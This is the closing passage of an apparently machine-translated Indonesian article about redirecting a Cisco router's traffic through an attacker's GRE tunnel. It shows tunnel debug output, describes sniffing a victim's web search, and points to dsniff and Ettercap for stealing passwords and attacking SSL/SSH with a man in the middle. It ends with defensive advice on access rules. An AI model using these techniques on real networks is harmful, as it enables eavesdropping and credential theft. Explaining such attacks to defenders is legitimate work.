Anda dapat memeriksa apakah terowongan berfungsi dengan mengirimkan perintah debug ke router penyerang:

Attacker# debug tunnel *3 Mar 06:38: Tunnel0: GRE/IP untuk mengklasifikasikan 212.199.145.242 ->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0) *3 Mar 06:38: Tunnel0: adjacency fixup, 80.179.20.55 -> 212.199.145.242, tos=0x0 *3 Mar 06:38: Tunnel0: GRE/IP untuk mengklasifikasikan 212.199.145.242 ->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0) *3 Mar 06:38: Tunnel0: adjacency fixup, 80.179.20.55 -> 212.199.145.242, tos=0x0g all Misalkan komputer yang diserang mencari “GRE Sniffing” di Google, seperti yang ditunjukkan pada Gambar 8.


Gambar 8. Korban sedang mencari informasi tentang terowongan GRE.

Akibat tindakan tersebut, Ethereal di komputer penyerang akan menerima paket yang ditunjukkan pada Gambar 9.




Gambar 9. Sniffer menunjukkan permintaan Google untuk informasi tentang terowongan GRE.

Selain menggunakan sniffer khusus (seperti dsniff) untuk mencegat kata sandi cleartext, kita dapat melakukan serangan canggih man-in-the-middle di komputer korban. Ettercap adalah utilitas bagus yang memungkinkan, selain mencegat jenis yang berbeda kata sandi, atur serangan man-in-the-middle pada enkripsi protokol SSL dan SSH. Dengan bantuan filter Ettercap, Anda dapat mengatur dan mengubah lalu lintas yang lewat. Kemungkinannya hampir tak terbatas.

Kesimpulan

Terkadang beberapa hal tidak seperti yang terlihat. Saat berurusan dengan SNMP (atau protokol berbasis UDP lainnya), Anda harus selalu waspada terhadap celah dan celah yang, jika diabaikan, dapat membahayakan jaringan Anda.

Dalam contoh yang dijelaskan, aturan akses tambahan yang secara eksplisit menentukan alamat server TFTP (terletak di router yang kami serang) akan cukup untuk menggagalkan serangan.

Skeptis mungkin bertanya "Bagaimana penyerang tahu tentang aturan akses / nama SNMP grup RW?". Informasi ini dapat diperoleh dengan kekerasan, tidak hanya nama grup, tetapi juga alamat IP yang diselesaikan, dan utilitas semacam itu sudah ada.

Tujuan artikel ini adalah untuk menunjukkan tidak begitu banyak keefektifan serangan yang dijelaskan sebagai celah potensial dalam protokol berdasarkan UDP. Ini sama sekali tidak berarti bahwa peralatan Cisco tidak aman. Konfigurasi yang kompeten harus meminimalkan kemungkinan melewati perlindungan. Kesalahan oleh administrator jaringan adalah penyebab utama kompromi pada peralatan Cisco.

Informasi tentang memperkuat keamanan router Cisco dapat ditemukan di



Memuat...
Atas